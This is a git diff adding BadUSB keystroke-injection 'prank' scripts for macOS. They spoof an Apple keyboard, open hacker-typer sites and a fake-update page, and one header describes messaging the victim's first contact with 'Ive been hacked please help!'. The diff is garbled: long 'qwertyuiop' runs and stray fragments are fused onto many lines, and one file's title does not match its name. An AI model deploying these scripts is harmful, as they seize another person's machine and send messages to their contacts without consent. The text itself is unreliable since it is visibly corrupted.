F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer NASA.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer NASA.txt new file mode 100644 index 00000000..c3238cfc --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer NASA.txt @@ -0,0 +1,87 @@ +REM Title: Hacker Typer Minecraft +REM Author: UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/nasa/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Tegnio.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Tegnio.txt new file mode 100644 index 00000000..db55dcb6 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Tegnio.txt @@ -0,0 +1,86 @@ +REM Title: Hacker Typer Tegnio +REM Author: UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/tegnio/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Umbrella.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Umbrella.txt new file mode 100644 index 00000000..517c47da --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Umbrella.txt @@ -0,0 +1,87 @@ +REM Title: Hacker Typer Umbrella +REM Author: UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/umbrella/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/IPHONE Fake Update.txt b/BadUSB/MacOS-narstybits/Pranks/IPHONE Fake Update.txt new file mode 100644 index 00000000..6aa039b0 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/IPHONE Fake Update.txt @@ -0,0 +1,19 @@ +REM Author: Narsty +REM Description: Open Fake update on an iPhone. +REM Version: 1.0 +REM Category: iPhone + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING safari +DELAY 2000 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 500 +STRING www.fakeupdate.net +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/Pranks/JasonBourneMessage Hack.txt b/BadUSB/MacOS-narstybits/Pranks/JasonBourneMessage Hack.txt new file mode 100644 index 00000000..07f672aa --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/JasonBourneMessage Hack.txt @@ -0,0 +1,34 @@ +REM Title: Message Hack +REM Author: NARSTY +REM Description: Opens Messages and types "Ive been hacked please help!" To the first contact +REM Will close and repeat but the second message will be "Jesus Christ... It's Jason Bourne!" +REM Target: MacOS 